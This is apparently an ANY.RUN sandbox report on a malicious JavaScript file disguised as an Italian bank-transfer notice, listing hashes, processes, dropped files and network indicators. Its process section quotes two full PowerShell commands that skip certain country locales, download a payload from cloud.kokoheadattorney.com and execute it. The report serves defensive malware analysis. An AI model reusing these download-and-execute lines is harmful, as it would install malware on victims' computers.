analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2019 0711-Eseguito_Bonifico_Europeo_Unico_0000_11075 xm.js

Full analysis: https://app.any.run/tasks/1adee127-4349-4867-bb35-1beed695fdb8
Verdict: Malicious activity
Analysis date: March 21, 2019, 14:36:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5:

467A15BBBD84943DD7035DF856EE5F07

SHA1:

64BA2288C6807AA3FDCFB67017A98A7C5903840E

SHA256:

BA03B218B8D79A8670928F207D43C5AD6EB61619AB328F94404C176CD2D13863

SSDEEP:

96:IAe/Kcjr1RpxSc+uu27qG9galQpehaHyscYuOpZJY/3k5At05hG0xkhZmauTZy:GCcjr3pxR+A7qG96yxaZC/KAtXhSTZy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executes PowerShell scripts

      • WScript.exe (PID: 2936)
    • Creates files in the user directory

      • powershell.exe (PID: 4060)
      • powershell.exe (PID: 2184)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2936"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\2019 0711-Eseguito_Bonifico_Europeo_Unico_0000_11075 xm.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4060"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $cvswesib = [System.IO.Path]::GetTempPath() + '\SearchI32.js'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/502?ijwyujfdawybbwxaaisjvxgj',$cvswesib); Start-Process $cvswesib;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2184"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; } $jwciad = [System.IO.Path]::GetTempPath() +'\..' +'\' + 'Dropbo.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/501?vjswiccxcagi',$jwciad); Start-Process $jwciad;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
537
Read events
405
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
4060powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W4T65QZLK6AN907PY2N5.temp
MD5:
SHA256:
2184powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\42831HSOFOSCBZ1WL60H.temp
MD5:
SHA256:
4060powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF100784.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
4060powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2184powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1007a3.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2184powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2184
powershell.exe
31.214.157.69:80
cloud.kokoheadattorney.com
easystores GmbH
NL
suspicious
4060
powershell.exe
31.214.157.69:80
cloud.kokoheadattorney.com
easystores GmbH
NL
suspicious

DNS requests

Domain
IP
Reputation
cloud.kokoheadattorney.com
  • 31.214.157.69
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info